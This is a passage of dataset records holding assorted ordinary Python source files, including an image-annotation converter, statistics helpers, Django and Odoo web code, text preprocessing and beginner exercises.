round(y/img_h,6) < 0:\n ty = str(0)\n elif round(y/img_h,6) > 1:\n ty = str(1)\n else:\n ty = str(round(y/img_h,6))\n\n if round((y+h)/img_h,6) < 0:\n by = str(0)\n elif round((y+h)/img_h,6) > 1:\n by = str(1)\n else:\n by = str(round((y+h)/img_h,6))\n\n\n\n\n #Normalization\n\n boundingBox_cord += str(id)+' '+ lx +' '+ ty + ' '+ rx +' '+ by + '\\n'\n\n boundingBox_cord = boundingBox_cord.rstrip()\n\n with open(file_write, 'a+') as f:\n f.write(boundingBox_cord)","repo_name":"zylofor/DataFormatConversion","sub_path":"x2coco/coco2txt(yolov5).py","file_name":"coco2txt(yolov5).py","file_ext":"py","file_size_in_byte":4215,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"27609232665","text":"#!/usr/bin/env python3\nimport math\n\n\ndef lcm(*args:int):\n \"\"\"Return the least common multiple of x and y.\"\"\"\n res = args[0]\n for e in args[1:]:\n res = (res*int(e)) // math.gcd(res, int(e))\n return res\n\n\n# def lcm(x, y):\n# \"\"\"Return the least common multiple of x and y.\"\"\"\n# x = int(x)\n# y = int(y)\n# return (x*y) // math.gcd(x, y)\n\n\ndef gcd(*args:int):\n res = args[0]\n for e in args[1:]:\n res = math.gcd(res, e)\n return res\n\n\ndef getSmallestFactor(x, limit=100):\n \"\"\"Given a float number, return the smallest number which,\n multiplied by x, gives an integer.\"\"\"\n for i in range(1, limit):\n if float(x*i).is_integer():\n return i\n raise RuntimeError(f'The smaller factor exceeds the limit of {limit}.')\n\n\ndef dictMerge(x:dict, y:dict, ignoreKey=None):\n \"\"\"Return the dict of the union of x with y,\n adding the values of same keys. 
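The four if/elif ladders in the coco2txt record all do the same thing: round a normalized coordinate to six decimals and clamp it to [0, 1]. The xywh-to-corner conversion can be written once (this sketch returns floats; the original stringifies each value for the txt output):

def normalize_box(x, y, w, h, img_w, img_h):
    clamp = lambda v: min(1.0, max(0.0, round(v, 6)))
    # Corners (lx, ty, rx, by), each normalized and clamped to [0, 1].
    return (clamp(x / img_w), clamp(y / img_h),
            clamp((x + w) / img_w), clamp((y + h) / img_h))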
Ignore ignoreKey.\"\"\"\n c = dict()\n for k,v in x.items():\n if k != ignoreKey:\n c[k] = v\n for k,v in y.items():\n if k != ignoreKey:\n if k in c:\n c[k] = c[k] + v\n else:\n c[k] = v\n return c\n\n\ndef getCommonLine(blockIN, blockOUT):\n \"\"\"Return the common line i.e: the output of blockIn with\n the same type of an input of blockOut.\"\"\"\n # First side\n for e in blockIN.outputs:\n for f in blockOUT.inputs:\n if e == f:\n return e\n return None\n\n\n\n# TEST\ndef test():\n # Test1\n to_delete = \"HeavyOil\"\n in1 = {\"HeavyOil\": 40,\"Water\": 30}\n in2 = {\"Water\": 30}\n res = dictMerge(in1, in2, to_delete)\n assert res == {'Water': 60}\n\n # Test2\n assert 2 == getSmallestFactor(0.5)\n assert 2 == getSmallestFactor(1.5)\n assert 10 == getSmallestFactor(0.1)\n assert 4 == getSmallestFactor(0.25)\n\n # Test3\n assert 2 == gcd(4,2,8)\n assert 4 == gcd(4,8)\n assert 2 == gcd(*{4,2,8})\n\n # Test3\n assert 2 == gcd(4,2,8)\n assert 4 == gcd(4,8)\n assert 2 == gcd(*{4,2,8})\n\n\n print('\\nSuccessful Tests!')","repo_name":"Envq/FactorioBlocks","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"22916715969","text":"import json\nimport os\n\nfrom tabulate import tabulate\nfrom gqn.json import JsonSerializable\n\n\nclass HyperParameters(JsonSerializable):\n def __init__(self):\n self.image_size = (64, 64)\n self.h_channels = 64\n self.z_channels = 3\n self.u_channels = 128\n self.r_channels = 256\n self.inference_share_core = False\n self.num_layers = 12\n self.generator_share_core = False\n self.initial_pixel_sigma = 2.0\n self.final_pixel_sigma = 0.7\n self.pixel_sigma_annealing_steps = 200000\n self.learning_rate_annealing_steps = 1600000\n self.representation_architecture = \"tower\"\n self.snapshot_filename = \"hyperparams.json\"\n\n def __str__(self):\n rows = []\n for key, value in self.__dict__.items():\n if key == \"snapshot_filename\":\n continue\n rows.append([key, value])\n return tabulate(rows, headers=[\"Hyperparameters\", \"\"])\n","repo_name":"musyoku/chainer-gqn","sub_path":"hyperparams.py","file_name":"hyperparams.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":185,"dataset":"github-code","pt":"27"} +{"seq_id":"35743416070","text":"import math\nimport numpy as np\nfrom scipy.optimize import root\n\n\ndef lambda_predmix_eb(\n x,\n truncation=math.inf,\n alpha=0.05,\n fixed_n=None,\n prior_mean=1 / 2,\n prior_variance=1 / 4,\n fake_obs=1,\n scale=1,\n):\n \"\"\"\n Predictable mixture lambda values or \"bets\"\n\n Parameters\n ----------\n x, array-like of 0-1 bounded reals\n Observed data\n\n truncation, positive real or infinity\n Level at which to truncate lambda\n\n alpha, (0, 1)-valued real\n Significance level in (0, 1)\n\n fixed_n, positive integer or None\n Sample size for which lambda should be optimized.\n If left as None, lambda will scale like 1/sqrt{t log t}\n\n prior_mean, [0, 1]-valued real\n Prior mean to use for regularized sample mean\n\n prior_variance, (0, 1/4]-valued real\n Prior variance to use for regularized sample variance\n\n fake_obs, positive integer\n Number of 'fake observations' to add.\n Larger values correspond to more regularization near\n `prior_mean` and `prior_variance`\n\n scale, positive real\n Scale by which to multiply final lambda output.\n For most applications, this should be left as 1\n\n Returns\n -------\n lambdas, 
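The variadic lcm in the utils record folds the pairwise identity lcm(a, b) = a*b // gcd(a, b) over its arguments; functools.reduce expresses the same fold directly:

import math
from functools import reduce

def lcm_reduce(*args):
    return reduce(lambda a, b: a * b // math.gcd(a, b), (int(a) for a in args))

assert lcm_reduce(4, 6, 10) == 60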
array-like of positive reals\n A (numpy) array of lambda values or \"bets\"\n \"\"\"\n t = np.arange(1, len(x) + 1)\n mu_hat_t = np.minimum((fake_obs * prior_mean + np.cumsum(x)) / (t + fake_obs), 1)\n mu_hat_tminus1 = np.append(prior_mean, mu_hat_t[0 : (len(x) - 1)])\n sigma2_t = (fake_obs * prior_variance + np.cumsum(np.power(x - mu_hat_t, 2))) / (\n t + fake_obs\n )\n sigma2_tminus1 = np.append(prior_variance, sigma2_t[0 : (len(x) - 1)])\n if fixed_n is None:\n lambdas = np.sqrt(2 * np.log(1 / alpha) / (t * np.log(1 + t) * sigma2_tminus1))\n else:\n lambdas = np.sqrt(2 * np.log(1 / alpha) / (fixed_n * sigma2_tminus1))\n\n lambdas[np.isnan(lambdas)] = 0\n\n lambdas = np.minimum(truncation, lambdas)\n\n return lambdas * scale\n\n\ndef lambda_aKelly(\n x,\n m,\n prior_mean=1 / 2,\n prior_variance=1 / 4,\n fake_obs=1,\n N=None,\n trunc_scale=1,\n):\n assert trunc_scale > 0 and trunc_scale <= 1\n t = np.arange(1, len(x) + 1)\n S_t = np.cumsum(x)\n x_tminus1 = np.append(0, x[0 : (len(x) - 1)])\n S_tminus1 = np.cumsum(x_tminus1)\n mu_hat_t = (fake_obs * prior_mean + np.cumsum(x)) / (t + fake_obs)\n mu_hat_tminus1 = np.append(prior_mean, mu_hat_t[0 : (len(x) - 1)])\n V_t = (fake_obs * prior_variance + np.cumsum(np.power(x - mu_hat_t, 2))) / (\n t + fake_obs\n )\n V_tminus1 = np.append(prior_variance, V_t[0 : (len(x) - 1)])\n\n if N is not None:\n conditional_mu_hat_tminus1 = (N * mu_hat_tminus1 - S_tminus1) / (N - t + 1)\n mu_t = (N * m - S_tminus1) / (N - (t - 1))\n else:\n conditional_mu_hat_tminus1 = mu_hat_tminus1\n mu_t = m\n\n lambdas = (conditional_mu_hat_tminus1 - mu_t) / (\n V_tminus1 + np.power(conditional_mu_hat_tminus1 - mu_t, 2)\n )\n\n lambdas = np.maximum(-trunc_scale / (1 - mu_t), lambdas)\n lambdas = np.minimum(trunc_scale / mu_t, lambdas)\n\n return lambdas\n\n\ndef lambda_Kelly(x, m):\n lambdas_init = lambda_aKelly(x, m, trunc_scale=1)\n lambdas = np.repeat(0.0, len(x))\n for i in np.arange(1, len(x)):\n\n def EL_fn(l):\n cand_val = np.sum((x[0:i] - m) / (1 + l * (x[0:i] - m)))\n return cand_val\n\n if np.max(x[0:i]) <= m:\n lambdas[i] = -1 / (1 - m)\n elif np.min(x[0:i]) >= m:\n lambdas[i] = 1 / m\n else:\n lambdas[i] = root(EL_fn, x0=lambdas_init[i])[\"x\"]\n lambdas[np.isnan(lambdas)] = 0\n lambdas = lambdas\n\n return lambdas\n\n\ndef lambda_LBOW(x, m):\n t = np.arange(1, len(x) + 1)\n S_t = np.cumsum(x)\n mu_hat_t = (1 / 2 + S_t) / (t + 1)\n mu_hat_tminus1 = np.append(1 / 2, mu_hat_t[0 : (len(mu_hat_t) - 1)])\n sigma2_tminus1 = np.append(1 / 4, np.cumsum(np.power(x - m, 2)))[0 : len(x)] / (\n t + 1\n )\n\n g = mu_hat_tminus1 - m\n M = np.where(g > 0, m, 1 - m)\n lambdas = g / (M * np.abs(g) + sigma2_tminus1 + np.power(g, 2))\n return lambdas\n","repo_name":"gostevehoward/confseq","sub_path":"src/confseq/betting_strategies.py","file_name":"betting_strategies.py","file_ext":"py","file_size_in_byte":4172,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"27"} +{"seq_id":"16619998837","text":"from rest_framework import permissions\n\n\nclass IsAuthorPermission(permissions.BasePermission):\n def has_object_permission(self, request, view, obj):\n return bool(\n request.method in permissions.SAFE_METHODS or\n (\n request.user and\n request.user.is_authenticated and\n obj.author == request.user.author\n )\n 
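In lambda_predmix_eb above, with fixed_n left as None the bets follow sqrt(2 log(1/alpha) / (t log(1+t) sigma^2_{t-1})), i.e. they shrink roughly like 1/sqrt(t log t) as evidence accumulates. A toy evaluation of that schedule (holding the running variance at the 1/4 prior purely for illustration):

import numpy as np

alpha = 0.05
t = np.arange(1, 6)
sigma2_tminus1 = np.full(5, 0.25)  # regularized variance, held fixed here
lambdas = np.sqrt(2*np.log(1/alpha) / (t*np.log(1 + t)*sigma2_tminus1))
# For a constant-variance stream the bets decrease monotonically in t.
assert np.all(np.diff(lambdas) < 0)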
)","repo_name":"Miwa-Abidin/final_test_git","sub_path":"app/posts/permissions.py","file_name":"permissions.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"31115752580","text":"#Control Flow and Logical Operators\n\n\n#If else, leap year or not\n\n# Don't change the code below \nyear = int(input(\"Which year do you want to check? \"))\n# Don't change the code above \n\n#Write your code below this line \n\nif((year % 4) != 0):\n print(\"Not leap year.\")\nelif((year % 100) != 0):\n print(\"Leap year.\")\nelif((year % 400) != 0):\n print(\"Not leap year.\")\nelse:\n print(\"Leap year.\")\n\n#Pizza cost calculator\n\n# Don't change the code below \nprint(\"Welcome to Python Pizza Deliveries!\")\nsize = input(\"What size pizza do you want? S, M, or L \")\nadd_pepperoni = input(\"Do you want pepperoni? Y or N \")\nextra_cheese = input(\"Do you want extra cheese? Y or N \")\n# Don't change the code above \n\n#Write your code below this line \n# Small Pizza: $15\n# Medium Pizza: $20\n# Large Pizza: $25\n# Pepperoni for Small Pizza: +$2\n# Pepperoni for Medium or Large Pizza: +$3\n# Extra cheese for any size pizza: + $1\n\ntotalCost = 0\n#print(type(totalCost))\nif(size == \"S\"):\n totalCost += 15\n if(add_pepperoni == \"Y\"):\n totalCost += 2\nif(size == \"M\"):\n totalCost += 20\n if(add_pepperoni == \"Y\"):\n totalCost += 3\nif(size == \"L\"):\n totalCost += 25\n if(add_pepperoni == \"Y\"):\n totalCost += 3\nif(extra_cheese == \"Y\"):\n totalCost += 1\n\nprint(f\"Your final bill is: ${totalCost}.\")\n\n\n\n#Love score calculator\n\n# Don't change the code below \nprint(\"Welcome to the Love Calculator!\")\nname1 = input(\"What is your name? \\n\")\nname2 = input(\"What is their name? 
\\n\")\n# Don't change the code above \n\n#Write your code below this line \n\nname1 = name1.casefold()\nname2 = name2.casefold()\n# print(name1)\n# print(name2)\ntotalTrue = ( (name1.count('t')) + (name1.count('r')) + (name1.count('u')) + (name1.count('e')) )\ntotalTrue += ( (name2.count('t')) + (name2.count('r')) + (name2.count('u')) + (name2.count('e')) )\n#print(type(totalTrue))\ntotalLove = ( (name1.count('l')) + (name1.count('o')) + (name1.count('v')) + (name1.count('e')) )\ntotalLove += ( (name2.count('l')) + (name2.count('o')) + (name2.count('v')) + (name2.count('e')) )\n\nloveScore = str(totalTrue) + str(totalLove)\n#print(type(loveScore))\n#print(loveScore)\nloveScore = int(loveScore)\n#print(type(loveScore))\n\nif( (loveScore < 10) or (loveScore > 90)):\n print(f\"Your score is {loveScore}, you go together like coke and mentos.\")\nelif( (loveScore >= 40) and (loveScore <= 50) ):\n print(f\"Your score is {loveScore}, you are alright together.\")\nelse:\n print(f\"Your score is {loveScore}.\")","repo_name":"saucysaracha/Python-Udemy-Course","sub_path":"ControlFlow.py","file_name":"ControlFlow.py","file_ext":"py","file_size_in_byte":2480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"4706529448","text":"# Written by Kai Seshimo (Semester 1, 2022) \n\nfrom download_azure_records import download_azure_records\nfrom merge_sd_records import merge_sd_records\nfrom convert_PAR_to_PAI import convert_PAR_to_PAI\n\nFILE_NAME_PAR = \"PARdata.csv\" #file name to save PAR data \n\nDEV_NUM_SQ110 = 6 #device number (1 to 6) to which SQ110 is connected\nPORT_NUM_SQ110 = 1 #port number (0 to 5) to which SQ110 is connected\n\nPUBLISH_PERIOD_MINUTE = 3 #data transmission period in minute (Default: 3)\nTIME_DIFFERENCE = 10 #time difference in hour from GST (Default: 10)\n\nLONGITUDE_DEGREE = 152.33307151919604 #longitude of the field in degree\nLATITUDE_DEGREE = -27.56270886720687 #latitude of the field in degree\n\nNUM_DEVICES = 6 #number of total IoT devices. (Default: 6)\nNUM_PORTS = 6 #number of total ports on each device (Default: 6)\n\ndef main():\n PAR_lists = download_azure_records(FILE_NAME_PAR, NUM_DEVICES, NUM_PORTS, PUBLISH_PERIOD_MINUTE)\n convert_PAR_to_PAI(PAR_lists, FILE_NAME_PAR, NUM_DEVICES, NUM_PORTS, DEV_NUM_SQ110, PORT_NUM_SQ110, \\\n TIME_DIFFERENCE, LONGITUDE_DEGREE, LATITUDE_DEGREE, False)\n\n print(\"\\n\")\n answer = input(\"Do you have new SD records to merge? 
(Type yes or no) - Your input: \")\n if (answer == (\"yes\")):\n PAR_lists = merge_sd_records(FILE_NAME_PAR, NUM_DEVICES, NUM_PORTS, PUBLISH_PERIOD_MINUTE) \n convert_PAR_to_PAI(PAR_lists, FILE_NAME_PAR, NUM_DEVICES, NUM_PORTS, DEV_NUM_SQ110, PORT_NUM_SQ110, \\\n TIME_DIFFERENCE, LONGITUDE_DEGREE, LATITUDE_DEGREE, True)\n else:\n print(\"No new SD records\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"seshimo88/PARbar_NBIoT","sub_path":"Python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"38009845797","text":"from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('codelogs', '0001_initial'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='codelog',\n name='log',\n field=models.TextField(null=True, verbose_name='log', blank=True),\n ),\n ]\n","repo_name":"tangram/serafin","sub_path":"codelogs/migrations/0002_codelog_log.py","file_name":"0002_codelog_log.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"27"} +{"seq_id":"74717542470","text":"import re\r\nimport nltk\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom sklearn.model_selection import train_test_split\r\nfrom nltk.tokenize import word_tokenize\r\nfrom nltk.stem import WordNetLemmatizer\r\nimport spacy\r\nfrom PyDictionary import PyDictionary\r\nfrom nltk.corpus import stopwords\r\nimport copy\r\n\r\n\r\nclass Different_Preprocessing:\r\n\r\n def __init__(self, num_words, seq_len, path_train, path_test):\r\n self.data_train = path_train\r\n self.data_test = path_test\r\n self.num_words = num_words\r\n self.seq_len = seq_len\r\n self.vocabulary = dict()\r\n self.ind_word = dict()\r\n self.x_after_split = None\r\n\r\n self.x_train = None\r\n self.x_test = None\r\n self.y_train = None\r\n self.y_test = None\r\n\r\n nlp = spacy.load('en_core_web_md')\r\n self.dictionary = PyDictionary()\r\n # nltk.download('wordnet')\r\n\r\n self.STOPWORDS = set(stopwords.words('english'))\r\n self.SYMBOLS = re.compile('[^0-9a-z #+_]')\r\n self.stemmer = WordNetLemmatizer()\r\n\r\n def do_things(self):\r\n self.load_data()\r\n self.clean_text()\r\n self.text_tokenization()\r\n self.build_vocabulary()\r\n self.word_to_idx()\r\n self.padding_sentences()\r\n\r\n def load_data(self):\r\n # Reads the raw csv file and split into\r\n # sentences (x) and target (y)\r\n\r\n df = pd.read_csv(self.data_train)\r\n # df.drop(['id','keyword','location'], axis=1, inplace=True)\r\n # print(df)\r\n self.x_train = df['text'].values\r\n self.y_train = df['target'].values\r\n for index, ele in enumerate(self.y_train):\r\n self.y_train[index] = int(ele)\r\n\r\n df = pd.read_csv(self.data_test)\r\n # df.drop(['id','keyword','location'], axis=1, inplace=True)\r\n\r\n self.x_test = df['text'].values\r\n self.y_test = df['target'].values\r\n for index, ele in enumerate(self.y_test):\r\n self.y_test[index] = int(ele)\r\n\r\n def clean_text(self):\r\n self.x_train = [x.lower() for x in self.x_train]\r\n # Removes Special Characters\r\n self.x_train = [re.sub(r'\\W', ' ', x) for x in self.x_train]\r\n # Removes single characters\r\n self.x_train = [re.sub(r'\\s+[a-zA-Z]\\s+', ' ', x) for x in self.x_train]\r\n # Removes single characters from the start\r\n self.x_train = [re.sub(r'[^A-Za-z]+', ' ', x) for x in self.x_train]\r\n self.x_train = [re.sub(r'\\^[a-zA-Z]\\s+', ' ', x) for x in 
self.x_train]\r\n # replace multiple spaces with single space\r\n self.x_train = [re.sub(r'\\s+', ' ', x, flags=re.I) for x in self.x_train]\r\n self.x_train = [''.join([i for i in x if not i.isdigit()]) for x in self.x_train]\r\n\r\n self.x_test = [x.lower() for x in self.x_test]\r\n # Removes Special Characters\r\n self.x_test = [re.sub(r'\\W', ' ', x) for x in self.x_test]\r\n # Removes single characters\r\n self.x_test = [re.sub(r'\\s+[a-zA-Z]\\s+', ' ', x) for x in self.x_test]\r\n # Removes single characters from the start\r\n self.x_test = [re.sub(r'[^A-Za-z]+', ' ', x) for x in self.x_test]\r\n self.x_test = [re.sub(r'\\^[a-zA-Z]\\s+', ' ', x) for x in self.x_test]\r\n # replace multiple spaces with single space\r\n self.x_test = [re.sub(r'\\s+', ' ', x, flags=re.I) for x in self.x_test]\r\n self.x_test = [''.join([i for i in x if not i.isdigit()]) for x in self.x_test]\r\n\r\n # self.x_raw = [([self.stemmer.lemmatize(word) for word in x.split()]) for x in self.x_raw]\r\n\r\n def text_tokenization(self):\r\n # Tokenizes each sentence by implementing the nltk tool\r\n self.x_train = [word_tokenize(x) for x in self.x_train]\r\n self.x_test = [word_tokenize(x) for x in self.x_test]\r\n\r\n self.x_after_split = copy.deepcopy(self.x_train)\r\n\r\n def build_vocabulary(self):\r\n # Builds the vocabulary and keeps the \"x\" most frequent words\r\n # self.vocabulary = dict()\r\n fdist = nltk.FreqDist()\r\n for sentence in self.x_train:\r\n for word in sentence:\r\n fdist[word] += 1\r\n common_words = fdist.most_common(self.num_words)\r\n # common_words = fdist.most_common(len(fdist))\r\n\r\n for idx, word in enumerate(common_words):\r\n self.vocabulary[word[0]] = (idx + 1)\r\n self.ind_word[idx] = word[0]\r\n\r\n def word_to_idx(self):\r\n # By using the dictionary (vocabulary), it is transformed\r\n # each token into its index based representation\r\n\r\n temp = list()\r\n for sentence in self.x_train:\r\n temp_sentence = list()\r\n for word in sentence:\r\n if word in self.vocabulary.keys():\r\n temp_sentence.append(self.vocabulary[word])\r\n temp.append(temp_sentence)\r\n self.x_train = temp\r\n\r\n temp = list()\r\n for sentence in self.x_test:\r\n temp_sentence = list()\r\n for word in sentence:\r\n if word in self.vocabulary.keys():\r\n temp_sentence.append(self.vocabulary[word])\r\n # else:\r\n # temp_sentence.append(-1)\r\n temp.append(temp_sentence)\r\n self.x_test = temp\r\n\r\n def padding_sentences(self):\r\n # Each sentence which does not fulfill the required len\r\n # it's padded with the index 0\r\n\r\n pad_idx = 0\r\n temp = list()\r\n\r\n for sentence in self.x_train:\r\n while len(sentence) < self.seq_len:\r\n sentence.insert(len(sentence), pad_idx)\r\n temp.append(sentence)\r\n self.x_train = np.array(temp)\r\n\r\n temp = list()\r\n for sentence in self.x_test:\r\n while len(sentence) < self.seq_len:\r\n sentence.insert(len(sentence), pad_idx)\r\n temp.append(sentence)\r\n self.x_test = np.array(temp)\r\n\r\n def inx_to_sent(self, indicies):\r\n sent = list()\r\n for ele in indicies:\r\n sent.append(self.ind_word[ele])\r\n return sent\r\n\r\n\r\n","repo_name":"ColtonAarts/CurrentThesis","sub_path":"Other/src/preprocessing/different_preprocessing.py","file_name":"different_preprocessing.py","file_ext":"py","file_size_in_byte":6060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"35313169293","text":"from semDiff.fullDiff import FullSemDiff\nimport json\nimport os\n\npath = 
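padding_sentences above right-pads every index sequence with 0 up to seq_len but never truncates, so a sentence longer than seq_len survives at full length. A common variant (an assumption here, not what the class does) pads and truncates in one step, guaranteeing a rectangular array:

import numpy as np

def pad_or_truncate(sequences, seq_len, pad_idx=0):
    # Right-pad with pad_idx, then cut everything to exactly seq_len.
    return np.array([(list(s) + [pad_idx] * seq_len)[:seq_len] for s in sequences])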
os.path.join(os.path.dirname(__file__), \"./data\")\nwith open(os.path.join(path, \"dats.json\"), 'r') as dats_file:\n # Load the JSON schema and close the file\n network1 = json.load(dats_file)\n dats_file.close()\n\npath = os.path.join(os.path.dirname(__file__), \"./data\")\nwith open(os.path.join(path, \"miaca.json\"), 'r') as miaca_file:\n # Load the JSON schema and close the file\n network2 = json.load(miaca_file)\n miaca_file.close()\n\nnetworks_contexts = [network1[\"contexts\"], network2[\"contexts\"]]\nfull_diff = FullSemDiff(networks_contexts, network1[\"schemas\"], network2[\"schemas\"])\n\noutput = {\n \"network1\": network1,\n \"network2\": network2,\n \"overlaps\": full_diff.twins\n}\n\nfile_name = network1[\"name\"] + '_VS_' + network2[\"name\"] + '_overlaps.json'\nfile_full_path = os.path.join(os.path.dirname(__file__), 'fullDiffOutput/' + file_name)\n\nwith open(file_full_path, 'w') as outfile:\n json.dump(output, outfile)\noutfile.close()\n","repo_name":"agbeltran/jsonldschema","sub_path":"tests/fullDiffExample.py","file_name":"fullDiffExample.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"21860987703","text":"import json\n\nimport requests\n\nfrom odoo import http\nfrom odoo.http import request, Response\n\nclass ModulaController(http.Controller):\n\n def _do_basic_auth(self):\n auth = request.httprequest.authorization\n request.session.authenticate(request.env.cr.dbname, auth.username, auth.password)\n\n @http.route('/modula/input_request', auth='public', type='http', methods=['post'], csrf=False)\n def input_request(self, code, qty):\n self._do_basic_auth()\n\n qty = float(qty)\n\n # TODO find out a way to find stock locations without depending on localization setting\n src_location_id = request.env['stock.location'].search([('complete_name', '=', 'SF/Existencias')])[0].id\n dest_location_id = request.env['stock.location'].search([('complete_name', '=', 'SF/Existencias/Modula Slim')])[0].id\n\n return self._do_transfer(code, float(qty), src_location_id, dest_location_id)\n\n @http.route('/modula/output_request', auth='public', type='http', methods=['post'], csrf=False)\n def output_request(self, code, qty):\n self._do_basic_auth()\n\n qty = float(qty)\n\n # TODO find out a way to find stock locations without depending on localization setting\n src_location_id = request.env['stock.location'].search([('complete_name', '=', 'SF/Existencias/Modula Slim')])[0].id\n dest_location_id = request.env['stock.location'].search([('complete_name', '=', 'SF/Existencias')])[0].id\n\n return self._do_transfer(code, float(qty), src_location_id, dest_location_id)\n\n\n\n def _do_transfer(self, product_code, qty, origin_id, dest_id):\n product = request.env['product.product'].search([('default_code', '=', product_code)])\n\n if len(product) == 0:\n # if the given code was not found, 404\n return Response('could not find product with given code', status=404)\n\n if len(product) > 1:\n # sanity check, if more than one product with same code was found\n return Response(status=500)\n\n picking = request.env['stock.picking'].create([{\n 'move_type': 'one',\n 'picking_type_id': request.env.ref('modula.sf_to_modula_move_t').id,\n 'location_id': origin_id,\n 'location_dest_id': dest_id,\n }])[0]\n\n request.env['stock.move'].create([{\n 'name': '',\n 'picking_id': picking.id,\n 'product_id': product.id,\n 'product_uom': product.uom_id.id,\n 'product_uom_qty': qty,\n 'location_id': 
origin_id,\n 'location_dest_id': dest_id,\n }])\n\n picking[0].action_confirm()\n picking[0].action_assign()\n\n if picking[0].state != 'assigned':\n # not enough products were found, delete the picking and error out\n picking.unlink()\n return Response('unable to reserve quantity requested', status=409)\n\n return Response(str(picking[0].id), status=200)\n\n\n#\n @http.route('/modula/tray_status', auth='public', type='http',methods=['get'])\n def picking_status(self, picking_id):\n self._do_basic_auth()\n\n picking = request.env['stock.picking'].browse([int(picking_id)])\n\n response = requests.get('http://10.22.229.191/Modula/api/Picking')\n\n if len(response.text) == 0:\n return Response(json.dumps({\n 'status': 'not in picking'\n }), status=200)\n\n body = response.json()\n\n if body['Item'] != picking.move_ids[0].product_id.default_code or body['Cantidad'] != picking.move_ids[0].product_uom_qty:\n return Response(json.dumps({\n 'status': 'other product in picking',\n 'product': body['Item']\n }), status=200)\n\n return Response(json.dumps({\n 'status': 'in picking',\n 'qty': body['Cantidad'],\n 'tray_id': body['Baia'], # (sic)\n 'pos_x': body['PosX'],\n 'pos_y': body['PosY'],\n 'dim_x': body['DimX'],\n 'dim_y': body['DimY'],\n }), status=200)\n\n\n @http.route('/modula/request_confirmation', auth='none', type='http',methods=['post'], csrf=False)\n def request_confirmation(self, picking_id):\n self._do_basic_auth()\n\n picking = request.env['stock.picking'].browse([int(picking_id)])\n\n action = picking.button_validate()\n\n for key in action.keys():\n print(key)\n\n transfer = request.env['stock.immediate.transfer']\n\n transfer = transfer.create([{\n 'pick_ids': [picking.id],\n }])\n\n transfer_line = request.env['stock.immediate.transfer.line']\n\n transfer_line.create([{\n 'to_immediate': True,\n 'immediate_transfer_id': transfer[0].id,\n 'picking_id': picking[0].id,\n }])\n\n transfer[0].with_context(action['context']).process()\n\n return Response(status=200)","repo_name":"SmartFactory-Tec/odoo_addons","sub_path":"modula/controllers/ModulaController.py","file_name":"ModulaController.py","file_ext":"py","file_size_in_byte":4920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"33707720805","text":"def notas(*nota, sit=False):\n \"\"\"\n --> Função para analisar notas e a situação de um aluno(a)\n :param nota: Recebe as notas, pode receber uma ou mais (aceita várias)\n :param sit: (opcional) Adiciona ao dicionário a situação do aluno(a):\n Se média >= 7: situação = BOA\n Se 5 <= média < 7: situação = RAZOÁVEL\n Se média < 5: situação = RUIM\n :return: Retorna um dicionário contendo o total de notas, a maior, a menor, a média, e pode retornar a situação\n \"\"\"\n notas_dic = {\n 'total': len(nota),\n 'maior': max(nota),\n 'menor': min(nota),\n 'média': sum(nota)/len(nota)\n }\n if sit:\n if notas_dic['média'] >= 7:\n notas_dic['situação'] = 'BOA'\n elif 5 <= notas_dic['média'] < 7:\n notas_dic['situação'] = 'RAZOÁVEL'\n else:\n notas_dic['situação'] = 'RUIM'\n return notas_dic\n\n\n# Programa Principal\nresp = notas(5, 10, 0, sit=True)\nprint(resp)\nhelp(notas)\n","repo_name":"JoaoBortolace/Python","sub_path":"exercícios/5 - Funções/def105.py","file_name":"def105.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"40030772936","text":"import pandas as pd\nfrom pandas import DataFrame\nimport numpy as np\nfrom sklearn 
import metrics\nimport heapq\nimport random\nfrom random import choice\nfrom copy import deepcopy\n\n\ndef calclass(value, threshold):\n new_value = []\n for i in value:\n if i > threshold:\n new_value.append(1)\n else:\n new_value.append(0)\n return new_value\n\n\ndef binary_perf_ddG(Y_true, Y_pred, threshold=1.36):\n\n y_true = calclass(Y_true, 1.36)\n y_pred = calclass(Y_pred, threshold)\n\n # calculate the precision, recall and F1\n F1_score = metrics.f1_score(y_true, y_pred)\n Recall_score = metrics.recall_score(y_true, y_pred)\n Precision_score = metrics.precision_score(y_true, y_pred)\n Balanced_accuracy_score = metrics.balanced_accuracy_score(y_true, y_pred)\n MMC = metrics.matthews_corrcoef(y_true, y_pred)\n\n # record the performance\n perf = {\n 'Recall': Recall_score,\n 'Precision': Precision_score,\n 'Balanced Accuracy': Balanced_accuracy_score,\n 'F1 Score': F1_score,\n 'Matthews Correlation Coefficient': MMC\n }\n\n return perf\n\n\ndef binary_perf_top(Y_true, Y_pred, threshold=0.15):\n \n top = int(len(Y_pred)*threshold)\n top_index = heapq.nlargest(top, range(len(Y_pred)), Y_pred.__getitem__)\n top_pred = []\n\n for i in range(len(Y_pred)):\n if i in top_index:\n top_pred.append(1)\n else:\n top_pred.append(0)\n\n y_true = calclass(Y_true, 1.36)\n\n perf = {\n 'Recall': metrics.recall_score(y_true, 